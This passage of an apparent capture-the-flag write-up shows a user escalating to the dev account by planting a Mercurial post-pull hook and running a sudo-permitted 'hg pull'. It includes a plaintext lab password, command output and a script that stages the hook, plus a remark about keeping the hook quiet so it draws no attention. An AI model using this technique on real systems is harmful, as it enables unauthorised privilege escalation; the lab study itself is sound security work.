qa
Checking for sudo privileges of the qa user after making the Lateral Movement:
qa@yummy:~$ sudo -l
[sudo] password for qa: jPAd!XQCtn8Oc@2B
Matching Defaults entries for qa on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User qa may run the following commands on localhost:
(dev : dev) /usr/bin/hg pull /home/dev/app-production/
The qa user is able to execute /usr/bin/hg pull /home/dev/app-production/ as the dev user.
hg
The hg binary is the command-line tool for interacting with Mercurial, a distributed version control system. It allows users to perform various version control operations such as cloning repositories, committing changes, merging branches, and managing file histories. The hg command provides a wide range of features for source code management, enabling efficient collaboration and tracking of changes across projects.
The presence of Mercurial was initially discovered because the QA team appeared to have used it to test the web application.
Reading further into the official documentation, there is a per-repository configuration file, .hg/hgrc, whose settings take precedence over those in $HOME/.hgrc.
The syntax is the familiar ini-file format: sections in square brackets, key = value entries underneath.
There is a section called [hooks] whose entries are shell commands that Mercurial runs on specific events, so a repository config that another user's hg reads is a way to get code execution as that user.
One family of hooks is post-<command>, run after the named command completes successfully.
It therefore appears possible to define a post-pull hook that fires when the sudo privileged-command runs hg pull as dev.
Testing
qa@yummy:/tmp$ cat ~/.hgrc
# example user config (see 'hg help config' for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <jdoe@example.com>
username = qa
# We recommend enabling tweakdefaults to get slight improvements to
# the UI over time. Make sure to set HGPLAIN in the environment when
# writing scripts!
# tweakdefaults = True
# uncomment to disable color in command output
# (see 'hg help color' for details)
# color = never
# uncomment to disable command output pagination
# (see 'hg help pager' for details)
# paginate = never
[extensions]
# uncomment the lines below to enable some popular extensions
# (see 'hg help extensions' for more info)
#
# histedit =
# rebase =
# uncommit =
[trusted]
users = qa, dev
groups = qa, dev
The current user already has a .hgrc file in the home directory.
This matters because the [trusted] section (a config section, not a hook) sets the security policy: Mercurial only honours a configuration file, and the hooks in it, if the file is owned by the current user or by a user or group listed there; otherwise it prints a "not trusting file ... from untrusted user" warning and ignores its settings. Since the sudo command runs hg as dev, the trust list that counts is the one hg reads when running as dev.
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
abort: no repository found in '/dev/shm' (.hg not found)
Executing the sudo privileged-command alone aborts: hg pull needs an existing repository (a .hg directory) in the current working directory to pull into. The sudoers rule fixes only the source path; the destination is wherever the command is run from, and that directory is under qa's control.
qa@yummy:/dev/shm$ mkdir .hg
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
pulling from /home/dev/app-production/
abort: could not lock working directory of /dev/shm: Permission denied
I created the .hg directory and executed the command again, but it still throws a permission error.
qa@yummy:/dev/shm$ chmod 777 .hg
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
pulling from /home/dev/app-production/
requesting all changes
adding changesets
adding manifests
adding file changes
added 6 changesets with 129 changes to 124 files
new changesets f54c91c7fae8:6c59496d5251
(run 'hg update' to get a working copy)
Changing the permission bits of the .hg directory lets the sudo privileged-command complete, since dev needs write access to it in order to lock and populate the repository.
qa@yummy:/dev/shm$ ll .hg
total 52
drwxrwxrwx 4 qa qa 280 Oct 7 14:24 ./
drwxrwxrwt 3 root root 60 Oct 7 14:24 ../
-rw-rw-rw- 1 dev dev 1281 Oct 7 14:24 00changelog.d
-rw-rw-rw- 1 dev dev 456 Oct 7 14:24 00changelog.i
-rw-rw-rw- 1 dev dev 4424 Oct 7 14:24 00manifest.d
-rw-rw-rw- 1 dev dev 456 Oct 7 14:24 00manifest.i
-rw-rw-rw- 2 dev dev 8 Oct 7 14:24 branch
drwxrwxrwx 2 dev dev 100 Oct 7 14:24 cache/
drwxrwxrwx 6 dev dev 160 Oct 7 14:24 data/
-rw-rw-rw- 1 dev dev 0 Oct 7 14:24 phaseroots
-rw-rw-rw- 1 dev dev 12450 Oct 7 14:24 undo
-rw-rw-rw- 2 dev dev 8 Oct 7 14:24 undo.backup.branch.bck
-rw-rw-rw- 1 dev dev 55 Oct 7 14:24 undo.backupfiles
-rw-rw-rw- 1 dev dev 39 Oct 7 14:24 undo.desc
The .hg directory is populated, and the new files are owned by dev, confirming that the pull ran as that user.
Now that I have confirmed the functionality of the sudo privileged-command, I can get to exploiting it with the hgrc file.
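The staging steps above (create and open up .hg, run the pull as dev) and the [hooks] post-pull idea from the Mercurial documentation combine into the following script. It is an added example, not code from the original writeup: it writes a repository-level .hg/hgrc whose post-pull hook records the output of id and the HG_* hook environment variables, so the execution context of the hook is visible after the pull. The hook command, the hook.out filename, the STAGE_DIR and RUN_PULL variables and the helper function names are assumptions of this example; on the box STAGE_DIR would be /dev/shm as in the writeup.

```sh
#!/bin/sh
# Added example (not part of the original writeup).
# Stage a per-repository .hg/hgrc with a post-pull hook, then optionally run
# the sudo-permitted pull so that dev's hg executes the hook.
# Assumed by this example: STAGE_DIR (defaults to a temp dir; /dev/shm on the box),
# RUN_PULL=1 to actually invoke sudo, and the hook.out filename for the evidence.

STAGE_DIR="${STAGE_DIR:-$(mktemp -d)}"
REPO_SRC="/home/dev/app-production/"   # the source path fixed by the sudoers rule

# Write the repository-level config. hg looks for .hg in the current directory
# and reads .hg/hgrc from there; a [hooks] post-<command> entry is run through
# the shell after that command succeeds, so post-pull fires once the pull is done.
# The output file lives inside .hg because that directory is made world-writable
# below and dev must be able to create files in it.
write_hook_hgrc() {
    dir="$1"
    mkdir -p "$dir/.hg"
    chmod 777 "$dir/.hg"        # dev needs write access to lock and populate it
    cat > "$dir/.hg/hgrc" <<EOF
[hooks]
post-pull = (id; env | grep '^HG_') > $dir/.hg/hook.out 2>&1; true
EOF
    chmod 644 "$dir/.hg/hgrc"   # readable by dev; ownership stays with qa
}

# Number of post-pull hooks defined in a staged hgrc (sanity check helper).
hook_count() {
    grep -c '^post-pull' "$1/.hg/hgrc"
}

# Run the privileged pull from the staged directory. If hg prints
# "not trusting file ... from untrusted user", the file owner is not in the
# [trusted] list that dev's hg reads and the hook is silently skipped.
run_privileged_pull() {
    cd "$1" || return 1
    sudo -u dev /usr/bin/hg pull "$REPO_SRC"
    cat "$1/.hg/hook.out"       # uid/gid of dev here means the hook ran as dev
}

write_hook_hgrc "$STAGE_DIR"
if [ "${RUN_PULL:-0}" = 1 ]; then
    run_privileged_pull "$STAGE_DIR"
fi
```

The hook deliberately ends with `true`: post-<command> hooks run in a shell, and keeping the exit status clean avoids any noise in the pull output that would draw attention to the staged config.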
Moving on to the Lateral Movement phase